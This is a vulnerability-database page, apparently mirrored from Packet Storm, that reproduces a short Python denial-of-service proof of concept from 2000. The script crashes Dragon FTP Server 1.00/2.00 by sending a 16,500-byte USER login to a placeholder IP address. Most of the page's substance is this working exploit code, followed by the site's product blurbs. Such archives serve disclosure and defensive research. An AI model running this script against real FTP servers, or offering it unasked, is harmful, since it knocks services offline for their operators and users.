Lucene search
K

dragonftp.py

🗓️ 30 Jun 2000 00:00:00Reported by PrizmType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Dragon FTP DoS attack script crashes service via oversized USER command on vulnerable servers.

Code
`#!/usr/bin/python  
#  
# Dragon Server(ftp) DoS Proof of Concept Code.  
# Vulnerability Discovered by USSR Labs(http://www.ussrback.com)  
# Simple Script by Prizm([email protected])  
#   
# By connecting to port 21(ftp) on a system running Dragon FTP Server v1.00/2.00 and typing   
# USER (16500 bytes) the service will crash  
#  
# This *simple* little script will cause Dragon Server's ftp service to crash.  
  
from ftplib import FTP  
  
ftp = FTP('xxx.xxx.xxx.xxx') # Replace x's with IP.   
ftp.login('A' * 16500)   
ftp.quit()  
  
#end`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Jun 2000 00:00Current
7.4High risk
Vulners AI Score7.4
25